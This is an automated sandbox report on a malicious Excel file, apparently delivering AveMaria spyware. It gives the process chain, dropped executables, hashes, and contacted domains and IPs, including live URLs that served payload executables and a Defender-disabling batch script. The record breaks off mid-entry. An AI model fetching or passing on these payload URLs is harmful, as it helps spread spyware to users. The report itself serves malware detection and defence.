Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection 111 | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories 1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop

          Behavior Graph

[Behavior graph (figure not reproduced). Behavior Graph ID: 336545; Sample: spetsifikatsiya.xls; Startdate: 06/01/2021; Architecture: WINDOWS; Score: 100.]

Process chain shown in the graph: EXCEL.EXE starts cmd.exe (five instances), which start powershell.exe; one powershell.exe drops C:\Users\user\Documents\pd.bat and contacts cutt.ly (172.67.8.238, port 443) and 37.46.150.139 (port 80); a further cmd.exe starts mode.com, cmd.exe and powershell.exe, which contacts gtp.bg (195.191.149.103) and drops C:\Users\user\AppData\Roaming\sp.exe. sp.exe drops tmpCF32.tmp (XML) and gUuYfpYBjYgU.exe, starts schtasks.exe and a second sp.exe; the second sp.exe contacts yz.videomarket.eu (185.157.162.81, ports 1972 and 1973) and gtp.bg, drops eyBLwzbrUF1mwXoy.exe, ars4t7gFPGrepVgh.exe and 5DVxvgK9jn5gaBl[1].exe, and starts eyBLwzbrUF1mwXoy.exe (drops JrekdQ.exe, starts schtasks.exe) and ars4t7gFPGrepVgh.exe. A separate powershell.exe starts attrib.exe.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
spetsifikatsiya.xls | 14% | Virustotal |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\JrekdQ.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | 30% | ReversingLabs | ByteCode-MSIL.Spyware.AveMaria
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe | 30% | ReversingLabs | ByteCode-MSIL.Spyware.AveMaria
C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | 30% | ReversingLabs | ByteCode-MSIL.Spyware.AveMaria
C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | 19% | Metadefender |
C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | 30% | ReversingLabs | ByteCode-MSIL.Spyware.AveMaria
C:\Users\user\AppData\Roaming\JrekdQ.exe | 19% | Metadefender |

          Unpacked PE Files

Source | Detection | Scanner | Label
37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack | 100% | Avira | HEUR/AGEN.1109526
35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1135947
31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack | 100% | Avira | HEUR/AGEN.1109526

          Domains

Source | Detection | Scanner | Label
cutt.ly | 0% | Virustotal |
yz.videomarket.eu | 5% | Virustotal |
gtp.bg | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat | 4% | Virustotal |
http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe | 0% | Avira URL Cloud | safe
http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cutt.ly | 172.67.8.238 | true | true | | unknown
yz.videomarket.eu | 185.157.162.81 | true | true | | unknown
gtp.bg | 195.191.149.103 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high

            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://37.46.150.139/bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat | false | 4%, Virustotal; Avira URL Cloud: safe | unknown
http://gtp.bg/opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | false | | high
http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.piriform.com/ccleaner | powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp | false | | high
http://www.%s.comPA | powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp | false | URL Reputation: safe (4x) | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piri | powershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmp | false | | high
https://curl.haxx.se/docs/http-cookies.html | sp.exe | false | | high

                        Contacted IPs

                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.8.238 | unknown | United States | 13335 | CLOUDFLARENETUS | true
208.95.112.1 | unknown | United States | 53334 | TUT-ASUS | false
195.191.149.103 | unknown | Bulgaria | 201200 | SUPERHOSTING_ASBG | true
185.157.162.81 | unknown | Sweden | 197595 | OBE-EUROPEObenetworkEuropeSE | true
37.46.150.139 | unknown | Moldova Republic of | 8758 | IWAYCH | false

                        General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336545
Start date: 06.01.2021
Start time: 09:56:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 50s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: spetsifikatsiya.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLS@57/27@7/5
EGA Information: Failed
HDC Information:
                        • Successful, ratio: 10.2% (good quality ratio 4.7%)
                        • Quality average: 26.5%
                        • Quality standard deviation: 31.3%
                        HCA Information:
                        • Successful, ratio: 72%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Changed system and user locale, location and keyboard layout to French - France
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 93.184.221.240
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
09:57:43 | API Interceptor | 485x Sleep call for process: powershell.exe modified
09:58:02 | API Interceptor | 1519x Sleep call for process: sp.exe modified
09:58:36 | API Interceptor | 3x Sleep call for process: schtasks.exe modified
09:59:03 | API Interceptor | 733x Sleep call for process: eyBLwzbrUF1mwXoy.exe modified
09:59:53 | API Interceptor | 46x Sleep call for process: ars4t7gFPGrepVgh.exe modified

                        Joe Sandbox View / Context

                        IPs

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                        172.67.8.238 | 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls | Get hash | malicious | Browse |
                         | New Avinode Plans and Prices 2021.xls | Get hash | malicious | Browse |
                         | spetsifikatsiya.xls | Get hash | malicious | Browse |
                         | file.xls | Get hash | malicious | Browse |
                         | file.xls | Get hash | malicious | Browse |
                         | output.xls | Get hash | malicious | Browse |
                         | SecuriteInfo.com.Heur.20246.xls | Get hash | malicious | Browse |
                         | 30689741.xls | Get hash | malicious | Browse |
                         | 95773220855.xls | Get hash | malicious | Browse |
                         | MT-000137.xls | Get hash | malicious | Browse |
                         | MOT_507465.xls | Get hash | malicious | Browse |
                         | invoicedelivery20200912toxRG.xls | Get hash | malicious | Browse |
                         | inter.xls | Get hash | malicious | Browse |
                         | machine.xls | Get hash | malicious | Browse |
                         | urXFLGgIxo.xls | Get hash | malicious | Browse |
                         | LIST_OF_IDs_FOR_PAYOUT.xls | Get hash | malicious | Browse |
                         | wHrBhrpp3q.csv | Get hash | malicious | Browse |
                         | wHrBhrpp3q.csv | Get hash | malicious | Browse |
                         | wHrBhrpp3q.csv | Get hash | malicious | Browse |
                         | SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls | Get hash | malicious | Browse |
                        208.95.112.1 | dpR3o92MH1.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | ZZB5zuv1X0.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | g4Anm805Wp.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | y77ZcYP8V6.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | FileSetup-v58.37.15.exe | Get hash | malicious | Browse | ip-api.com/json
                         | TOP URGENT RFQ 2021 Anson Yang.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | update_2021-01-02_17-23.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | sVJhb3GPcJ.exe | Get hash | malicious | Browse | ip-api.com/json
                         | Client1.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | miner.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | 8H2nP7L2O9.exe | Get hash | malicious | Browse | ip-api.com/json
                         | OhGodAnETHlargementPill.sfx.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | SecuriteInfo.com.ArtemisF23FB6308BD9.exe | Get hash | malicious | Browse | ip-api.com/line
                         | kETiCWwh0I.exe | Get hash | malicious | Browse | ip-api.com/json
                         | CjGhhGeHtu.exe | Get hash | malicious | Browse | ip-api.com/xml
                         | 3rHcLCeu.exe | Get hash | malicious | Browse | ip-api.com/json/
                         | XIP4K07X5N.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | vvf2pnwQzc.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | 6XNE5gElYE.exe | Get hash | malicious | Browse | ip-api.com/line/
                         | XF75HvMH33.exe | Get hash | malicious | Browse | ip-api.com/line/

                                                                Domains

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                        yz.videomarket.eu | dpR3o92MH1.exe | Get hash | malicious | Browse | 185.157.162.81
                         | ZZB5zuv1X0.exe | Get hash | malicious | Browse | 185.157.162.81
                         | zlkcd7HSQp.exe | Get hash | malicious | Browse | 185.157.162.81
                         | qdnLoWn1E8.exe | Get hash | malicious | Browse | 185.157.162.81
                         | ogYg79jWpR.exe | Get hash | malicious | Browse | 185.157.162.81
                         | fola(1).exe | Get hash | malicious | Browse | 185.157.161.109
                         | OQUToJt233.exe | Get hash | malicious | Browse | 185.157.161.109
                         | jbrowserQ.exe | Get hash | malicious | Browse | 185.157.161.109
                        cutt.ly | Payment Documents.xls | Get hash | malicious | Browse | 104.22.0.232
                         | Payment Documents.xls | Get hash | malicious | Browse | 104.22.1.232
                         | Shipping Document PLBL003534.xls | Get hash | malicious | Browse | 104.22.1.232
                         | 6Cprm97UTl.xls | Get hash | malicious | Browse | 104.22.0.232
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 104.22.0.232
                         | 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls | Get hash | malicious | Browse | 172.67.8.238
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 104.22.1.232
                         | New Avinode Plans and Prices 2021.xls | Get hash | malicious | Browse | 172.67.8.238
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 104.22.0.232
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 172.67.8.238
                         | AdviceSlip.xls | Get hash | malicious | Browse | 104.22.0.232
                         | file.xls | Get hash | malicious | Browse | 104.22.1.232
                         | file.xls | Get hash | malicious | Browse | 172.67.8.238
                         | file.xls | Get hash | malicious | Browse | 172.67.8.238
                         | output.xls | Get hash | malicious | Browse | 172.67.8.238
                         | SecuriteInfo.com.Heur.20246.xls | Get hash | malicious | Browse | 172.67.8.238
                         | SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls | Get hash | malicious | Browse | 104.22.1.232
                         | SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls | Get hash | malicious | Browse | 104.22.0.232
                         | 30689741.xls | Get hash | malicious | Browse | 172.67.8.238
                         | 95773220855.xls | Get hash | malicious | Browse | 104.22.1.232
                        ip-api.com | dpR3o92MH1.exe | Get hash | malicious | Browse | 208.95.112.1
                         | ZZB5zuv1X0.exe | Get hash | malicious | Browse | 208.95.112.1
                         | g4Anm805Wp.exe | Get hash | malicious | Browse | 208.95.112.1
                         | y77ZcYP8V6.exe | Get hash | malicious | Browse | 208.95.112.1
                         | FileSetup-v58.37.15.exe | Get hash | malicious | Browse | 208.95.112.1
                         | TOP URGENT RFQ 2021 Anson Yang.exe | Get hash | malicious | Browse | 208.95.112.1
                         | update_2021-01-02_17-23.exe | Get hash | malicious | Browse | 208.95.112.1
                         | sVJhb3GPcJ.exe | Get hash | malicious | Browse | 208.95.112.1
                         | Client1.exe | Get hash | malicious | Browse | 208.95.112.1
                         | t-rex-0.19.5-win.exe | Get hash | malicious | Browse | 208.95.112.1
                         | miner.exe | Get hash | malicious | Browse | 208.95.112.1
                         | 8H2nP7L2O9.exe | Get hash | malicious | Browse | 208.95.112.1
                         | PhoenixMiner_5.4c_Windows.exe | Get hash | malicious | Browse | 208.95.112.1
                         | OhGodAnETHlargementPill.sfx.exe | Get hash | malicious | Browse | 208.95.112.1
                         | SecuriteInfo.com.ArtemisF23FB6308BD9.exe | Get hash | malicious | Browse | 208.95.112.1
                         | kETiCWwh0I.exe | Get hash | malicious | Browse | 208.95.112.1
                         | CjGhhGeHtu.exe | Get hash | malicious | Browse | 208.95.112.1
                         | 3rHcLCeu.exe | Get hash | malicious | Browse | 208.95.112.1
                         | XIP4K07X5N.exe | Get hash | malicious | Browse | 208.95.112.1
                         | vvf2pnwQzc.exe | Get hash | malicious | Browse | 208.95.112.1

                                                                ASN

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                        SUPERHOSTING_ASBG | zlkcd7HSQp.exe | Get hash | malicious | Browse | 195.191.148.123
                         | machine.xls | Get hash | malicious | Browse | 195.191.148.123
                         | SJNRsFNyLl.exe | Get hash | malicious | Browse | 193.107.36.110
                         | 22DOC1.exe | Get hash | malicious | Browse | 185.45.66.199
                         | 9invoice.exe | Get hash | malicious | Browse | 195.191.149.84
                         | http://ifems-bg.com/Past-Due-Invoices/ | Get hash | malicious | Browse | 91.196.124.23
                         | https://linkto.ga/5P | Get hash | malicious | Browse | 195.191.148.216
                         | https://linkto.ga/5M | Get hash | malicious | Browse | 195.191.148.216
                        OBE-EUROPEObenetworkEuropeSE | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | dpR3o92MH1.exe | Get hash | malicious | Browse | 185.157.162.81
                         | 0qNSJXB8nG.exe | Get hash | malicious | Browse | 185.157.162.81
                         | Order_1101201918_AUTECH.exe | Get hash | malicious | Browse | 185.157.161.86
                         | 7w7LwD8bqe.exe | Get hash | malicious | Browse | 185.157.162.81
                         | ZZB5zuv1X0.exe | Get hash | malicious | Browse | 185.157.162.81
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 185.157.162.81
                         | ptoovvKZ80.exe | Get hash | malicious | Browse | 185.157.162.81
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 185.157.162.81
                         | EnJsj6nuD4.exe | Get hash | malicious | Browse | 185.157.162.81
                         | AdviceSlip.xls | Get hash | malicious | Browse | 217.64.149.169
                         | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | 50404868-c352-422f-a608-7fd64b335eec.exe | Get hash | malicious | Browse | 185.157.161.86
                         | DHL_file 187652345643476245.exe | Get hash | malicious | Browse | 185.157.160.233
                         | FedExs AWB#5305323204643.exe | Get hash | malicious | Browse | 185.157.160.233
                         | URGENT QUOTATION 473833057.exe | Get hash | malicious | Browse | 185.157.160.233
                         | P-O Doc #6620200947535257653.exe | Get hash | malicious | Browse | 185.157.160.233
                        TUT-ASUS | dpR3o92MH1.exe | Get hash | malicious | Browse | 208.95.112.1
                         | ZZB5zuv1X0.exe | Get hash | malicious | Browse | 208.95.112.1
                         | g4Anm805Wp.exe | Get hash | malicious | Browse | 208.95.112.1
                         | y77ZcYP8V6.exe | Get hash | malicious | Browse | 208.95.112.1
                         | FileSetup-v58.37.15.exe | Get hash | malicious | Browse | 208.95.112.1
                         | TOP URGENT RFQ 2021 Anson Yang.exe | Get hash | malicious | Browse | 208.95.112.1
                         | update_2021-01-02_17-23.exe | Get hash | malicious | Browse | 208.95.112.1
                         | sVJhb3GPcJ.exe | Get hash | malicious | Browse | 208.95.112.1
                         | Client1.exe | Get hash | malicious | Browse | 208.95.112.1
                         | miner.exe | Get hash | malicious | Browse | 208.95.112.1
                         | 8H2nP7L2O9.exe | Get hash | malicious | Browse | 208.95.112.1
                         | OhGodAnETHlargementPill.sfx.exe | Get hash | malicious | Browse | 208.95.112.1
                         | SecuriteInfo.com.ArtemisF23FB6308BD9.exe | Get hash | malicious | Browse | 208.95.112.1
                         | kETiCWwh0I.exe | Get hash | malicious | Browse | 208.95.112.1
                         | CjGhhGeHtu.exe | Get hash | malicious | Browse | 208.95.112.1
                         | 3rHcLCeu.exe | Get hash | malicious | Browse | 208.95.112.1
                         | XIP4K07X5N.exe | Get hash | malicious | Browse | 208.95.112.1
                         | vvf2pnwQzc.exe | Get hash | malicious | Browse | 208.95.112.1
                         | 6XNE5gElYE.exe | Get hash | malicious | Browse | 208.95.112.1
                         | XF75HvMH33.exe | Get hash | malicious | Browse | 208.95.112.1
                        CLOUDFLARENETUS | Shipping Document PL and BL003534.ppt | Get hash | malicious | Browse | 104.18.49.20
                         | Inquiry-RFQ93847849-pdf.exe | Get hash | malicious | Browse | 66.235.200.147
                         | PO20002106.exe | Get hash | malicious | Browse | 104.23.99.190
                         | SHIPPING INVOICEpdf.exe | Get hash | malicious | Browse | 172.67.187.112
                         | COO_TPE0269320_image2020-12-31-055841.exe | Get hash | malicious | Browse | 172.67.166.210
                         | Payment Documents.xls | Get hash | malicious | Browse | 104.22.0.232
                         | DATA-480841.doc | Get hash | malicious | Browse | 104.18.61.59
                         | eTrader-0.1.0.exe | Get hash | malicious | Browse | 104.23.98.190
                         | Documenten_9274874 8574977265.doc | Get hash | malicious | Browse | 104.18.61.59
                         | eTrader-0.1.0.exe | Get hash | malicious | Browse | 104.23.99.190
                         | pack-91089 416755919.doc | Get hash | malicious | Browse | 104.18.61.59
                         | Payment Documents.xls | Get hash | malicious | Browse | 104.22.1.232
                         | Shipping Document PLBL003534.xls | Get hash | malicious | Browse | 104.22.1.232
                         | QPI-01458.exe | Get hash | malicious | Browse | 172.67.188.154
                         | LITmNphcCA.exe | Get hash | malicious | Browse | 104.28.5.151
                         | http://fake-cash-app-screenshot-generator.hostforjusteasy.fun | Get hash | malicious | Browse | 172.67.179.45
                         | http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exe | Get hash | malicious | Browse | 104.16.203.237
                         | http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135 | Get hash | malicious | Browse | 104.16.19.94
                         | https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9 | Get hash | malicious | Browse | 104.16.18.94
                         | http://reppoflag.net/2307e0382f77c950a2.js | Get hash | malicious | Browse | 172.64.170.19

                                                                JA3 Fingerprints

                        Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                        05af1f5ca1b87cc9cc9b25185115607d | Shipping Document PL and BL003534.ppt | Get hash | malicious | Browse | 172.67.8.238
                         | Payment Documents.xls | Get hash | malicious | Browse | 172.67.8.238
                         | Shipping Document PLBL003534.xls | Get hash | malicious | Browse | 172.67.8.238
                         | ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc | Get hash | malicious | Browse | 172.67.8.238
                         | 6Cprm97UTl.xls | Get hash | malicious | Browse | 172.67.8.238
                         | DAT 2020_12_30.doc | Get hash | malicious | Browse | 172.67.8.238
                         | N.11389944 BS 05 gen 2021.doc | Get hash | malicious | Browse | 172.67.8.238
                         | PSX7103491.doc | Get hash | malicious | Browse | 172.67.8.238
                         | Beauftragung.doc | Get hash | malicious | Browse | 172.67.8.238
                         | 1I72L29IL3F.doc | Get hash | malicious | Browse | 172.67.8.238
                         | Adjunto_2021.doc | Get hash | malicious | Browse | 172.67.8.238
                         | #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | Get hash | malicious | Browse | 172.67.8.238
                         | Dok 0501 012021 Q_93291.doc | Get hash | malicious | Browse | 172.67.8.238
                         | invoice.doc | Get hash | malicious | Browse | 172.67.8.238
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 172.67.8.238
                         | 1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls | Get hash | malicious | Browse | 172.67.8.238
                         | output.xls | Get hash | malicious | Browse | 172.67.8.238
                         | output.xls | Get hash | malicious | Browse | 172.67.8.238
                         | spetsifikatsiya.xls | Get hash | malicious | Browse | 172.67.8.238
                         | New Avinode Plans and Prices 2021.xls | Get hash | malicious | Browse | 172.67.8.238

                                                                Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | dpR3o92MH1.exe | malicious
C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | dpR3o92MH1.exe | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe | dpR3o92MH1.exe | malicious
C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | dpR3o92MH1.exe | malicious
C:\Users\user\AppData\Roaming\JrekdQ.exe | dpR3o92MH1.exe | malicious

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                          Category:dropped
                                                                          Size (bytes):58936
                                                                          Entropy (8bit):7.994797855729196
                                                                          Encrypted:true
                                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):326
                                                                          Entropy (8bit):3.114736388632894
                                                                          Encrypted:false
                                                                          SSDEEP:6:kKTswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:7vkPlE99SNxAhUegeT2
                                                                          MD5:0BB35F55A536D3985F509EB3782968C7
                                                                          SHA1:DFC6C55ABA8740465413396C2C5F24CB42044A5C
                                                                          SHA-256:E6ADDDFFDDFB3EE69F5F60E4C2C912981DF7C8EFC7A3B7A8A879015E1A98537D
                                                                          SHA-512:8B114599EBEE2CD2008D85B5CFD9F8E63F0E6404D9A7A802B1062A541057D9E180A6853E745981562AC7343BFA3025D55807D4B48E6529C958711F9B9859F26C
                                                                          Malicious:false
                                                                          Preview: p...... ........HD"qU...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe
                                                                          Process:C:\Users\user\AppData\Roaming\sp.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):899072
                                                                          Entropy (8bit):7.536155290652203
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JPrXEn1XhKMgBAhXwNNXMZrHZaKJMZrQgrp1Lc:G7hXSerHZaKJMZrQgr
                                                                          MD5:CEC5782C931581F13CE3C5D5B6A948A2
                                                                          SHA1:0C0CE04D190FEC3265DF430F6D3DC58FBB979653
